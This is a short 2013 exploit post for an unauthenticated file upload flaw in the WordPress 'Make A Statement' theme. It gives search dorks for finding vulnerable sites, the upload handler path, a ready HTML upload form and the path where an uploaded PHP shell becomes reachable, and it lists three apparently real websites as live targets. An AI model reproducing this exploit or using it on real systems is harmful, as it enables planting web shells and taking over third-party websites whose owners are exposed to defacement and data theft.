Post: #1Wordpress Make A Statement Themes CSRF File Upload Vulnerability
#Title : Wordpress Make A Statement Themes CSRF File Upload Vulnerability
#Author : Erza Jullian
#Date : 11/17/2013 - 17 November 2013
#Category : Web Applications
#Type : PHP
#Version : 1.x.x
#Vendor : http://themes.mas.gambit.ph/
#Greetz : Newbie Security - Manusia Biasa Team - JKT48 Cyber Team - Indonesian Cyber Army
#Thanks : Anonymous Indonesia
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:wp-content/themes/make_a_statement
inurl:wp-content/themes/make_a_statement_v1
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/make_a_statement/library/includes/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/make_a_statement/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/IDCA.php
Live Demo :
http://pinnacleacademyva.com/
http://harmonicstudios.com/
http://taozuieu.com/Wordpress Make A Statement Themes CSRF File Upload Vulnerability
0 Komentar